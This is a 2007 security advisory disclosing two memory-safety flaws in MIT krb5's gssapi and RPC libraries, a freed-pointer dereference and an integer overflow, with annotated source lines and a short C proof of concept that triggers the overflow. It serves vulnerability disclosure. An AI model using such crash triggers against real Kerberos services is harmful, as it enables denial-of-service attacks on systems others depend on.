mit-krb5 lib vulnerability [Security Advisory]
Advisory: [AD_LAB-0714] mit-krb5 gssapi and rpc lib vulnerability
Class: Design Error
DATE: 11/9/2007
CVEID: CVE-2007-5901, CVE-2007-5902
Vulnerable: mit-krb5 All
Vendor: MIT

I. Synopsis
Two vulnerabilities have been discovered in the gssapi lib and rpc lib included in mit-krb5.

II. DETAILS:
----------
Background
The gssapi lib and rpc lib are cryptographic libraries included in mit-krb5.

Description
There is a freed-pointer dereference vulnerability in function gss_indicate_mechs(minorStatus, mechSet) in g_initialize.c.
......
197 for (i = 0; i < (*mechSet)->count; i++) {
198 curItem = &((*mechSet)->elements[i]);
199 curItem->elements =
200 (void *) malloc(g_mechSet.elements[i].length);
201 if (curItem->elements == NULL) {
202 (void) k5_mutex_unlock(&g_mechSetLock);
203 /*
204 * must still free the allocated elements for
205 * each allocated gss_OID_desc
206 */
207 for (j = 0; j < i; j++) {
208 free((*mechSet)->elements[j].elements);
209 }
210 free((*mechSet)->elements);
(1) Pointer "mechSet" freed by "free" (the caller's output argument itself, not the allocated set *mechSet)
211 free(mechSet);
(2) Dereferencing freed pointer "mechSet"
212 *mechSet = NULL;
213 return (GSS_S_FAILURE);
214 }
215 g_OID_copy(curItem, &g_mechSet.elements[i]);
216 }
217 (void) k5_mutex_unlock(&g_mechSetLock);
218 return (GSS_S_COMPLETE);
219 } /* gss_indicate_mechs */
......
There is an integer overflow vulnerability in function svcauth_gss_get_principal in svc_auth_gss.c
666 svcauth_gss_get_principal(SVCAUTH *auth)
667 {
668 struct svc_rpc_gss_data *gd;
669 char *pname;
670
671 gd = SVCAUTH_PRIVATE(auth);
672
673 if (gd->cname.length == 0)
674 return (NULL);
675
(1) if cname.length is set to 0xffffffff, the addition gd->cname.length + 1 on line 676 wraps around to 0 (with a 32-bit length), so malloc returns a zero-sized buffer and the memcpy on line 679 writes past the end of it
676 if ((pname = malloc(gd->cname.length + 1)) == NULL)
677 return (NULL);
678
679 memcpy(pname, gd->cname.value, gd->cname.length);
680 pname[gd->cname.length] = '\0';
681
682 return (pname);
683 }

Impact
A remote attacker may cause instability and potentially crash an application or service that uses the gssapi lib or rpc lib in mit-krb5.

POC
rpc_lib_poc:
#include <string.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#include <gssrpc/rpc.h>
#include <gssapi/gssapi.h>
#include <gssrpc/rpc.h>
#include <gssrpc/auth_gssapi.h>
#include "rpc_test.h"
struct svc_rpc_gss_data {
bool_t established; /* context established */
gss_ctx_id_t ctx; /* context id */
struct rpc_gss_sec sec; /* security triple */
gss_buffer_desc cname; /* GSS client name */
u_int seq; /* sequence number */
u_int win; /* sequence window */
u_int seqlast; /* last sequence number */
uint32_t seqmask; /* bitmask of seqnums */
gss_name_t client_name; /* unparsed name string */
gss_buffer_desc checksum; /* so we can free it */
};
int main(argc, argv)
int argc;
char **argv;
{
SVCAUTH auth;
struct svc_rpc_gss_data gd;
gd.cname.length=0xffffffff;
auth.svc_ah_private=&gd;
svcauth_gss_get_principal(&auth);
}

III. CREDIT:
----------
Venustech AD-LAB discovered this vulnerability. Thanks to all Venustech AD-Lab guys.

V. DISCLAIMS:
-----------
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Copyright 1996-2007 VENUSTECH. All Rights Reserved.
Terms of use. VENUSTECH Security Lab VENUSTECH INFORMATION TECHNOLOGY CO.,LTD(http://www.venustech.com.cn) Security Trusted {Solution} Provider Service
*** This bug has been marked as a duplicate of bug 199205 ***